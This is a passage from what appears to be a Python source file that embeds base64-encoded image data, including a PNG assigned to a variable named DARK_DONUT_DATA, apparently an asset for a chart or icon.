AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABLAJ8AcgDoAHIA6QByAOkAcgDpAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0ARQBhAMkAcgDpAHIA6QByAOkAcgDpAHIA6QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACsAYABbALwAbgDhAHIA6QByAOkAcgDpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkAHwA6AH0AbQDfAHIA6QByAOkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAALQBFAJMAYgDLAHAA5QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATADIAOQB7AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA///////////////gAAH/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8AAAD////////////////AAAAAA//////////////8AAAAAAA/////////////4AAAAAAAB////////////wAAAAAAAAD///////////gAAAAAAAAAH//////////gAAAAAAAAAAf/////////gAAAAAAAAAAB/////////gAAAAAAAAAAAH////////gAAAAAAAAAAAAf///////gAAAAAAAAAAAAB///////wAAAAAAAAAAAAAP//////wAAAAAAAAAAAAAA//////4AAAAAAAAAAAAAAH/////4AAAAAAAAAAAAAAAf////8AAAAAAAAAAAAAAAD////+AAAAAAAAAAAAAAAAf////AAAAAAAAAAAAAAAAD////gAAAAAAAAAAAAAAAAf///wAAAAAAAAAAAAAAAAD///4AAAAAAAAAAAAAAAAAf//8AAAAAAAAAAAAAAAAAD//+AAAAAAAAAAAAAAAAAAf//AAAAAAAAAAAAAAAAAAD//gAAAAAAAAAAAAAAAAAAf/4AAAAAAAAAAAAAAAAAAD/8AAAAAAAAAAAAAAAAAAA/+AAAAAAAAAAAAAAAAAAAH/gAAAAAAAAAAAAAAAAAAA/wAAAAAAAAAAAAAAAAAAAP8AAAAAAAAAAAAAAAAAAAB+AAAAAAAAAAAAAAAAAAAAfgAAAAAAAAAAAAAAAAAAADwAAAAAAAAAAAAAAAAAAAA8AAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/4AAAAAAAAAAAAAAAAAAP//8AAAAAAAAAAAAAAAAAf///4AAAAAAAAAAAAAAAAf////wAAAAAAAAAAAAAAAf/////AAAAAAAAAAAAAAAf/////4AAAAAAAAAAAAAAP//////AAAAAAAAAAAAAAH//////4AAAAAAAAAAAAAB///////AAAAAAAAAAAAAA///////wAAAAAAAAAAAAAP//////8AAAAAAAAAAAAAD///////AAAAAAAAAAAAAA///////wAAAAAAAAAAAAAP//////8AAAAAAAAAAAAAB//////+AAAAAAAAAAAAAAP//////gAAAAAAAAAAAAAB//////wAAAAAACAAAAAAAP/////4AAAAAAAgAAAAAAB/////4AAAAAAAYAAAAAAAH////4AAAAAAAHAAAAAAAAP///4AAAAAAADwAAAAAAAAf//gAAAAAAAA+AAAAAAAAAAAAAAAAAAAAfwAAAAAAAAAAAAAAAAAAAH8AAAAAAAAAAAAAAAAAAAD/gAAAAAAAAAAAAAAAAAAB/8AAAAAAAAAAAAAAAAAAAf/gAAAAAAAAAAAAAAAAAAP/4AAAAAAAAAAAAAAAAAAH//AAAAAAAAAAAAAAAAAAD//4AAAAAAAAAAAAAAAAAB///AAAAAAAAAAAAAAAAAA///4AAAAAAAAAAAAAAAAAf///gAAAAAAAAAAAAAAAAP///8AAAAAAAAAAAAAAAAH////gAAAAAAAAAAAAAAAH////+AAAAAAAAAAAAAAAD/////wAAAAAAAAAAAAAAD//////AAAAAAAAAAAAAAB//////4AAAAAAAAAAAAAB///////gAAAAAAAAAAAAB///////+AAAAAAAAAAAAB////////8AAAAAAAAAAAB/////////wAAAAAAAAAAD//////////gAAAAAAAAAH///////////AAAAAAAAAP///////////+AAAAAAAAf/////////////AAAAAAD///////////////wAAAAf////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8='
DARK_DONUT_DATA = b'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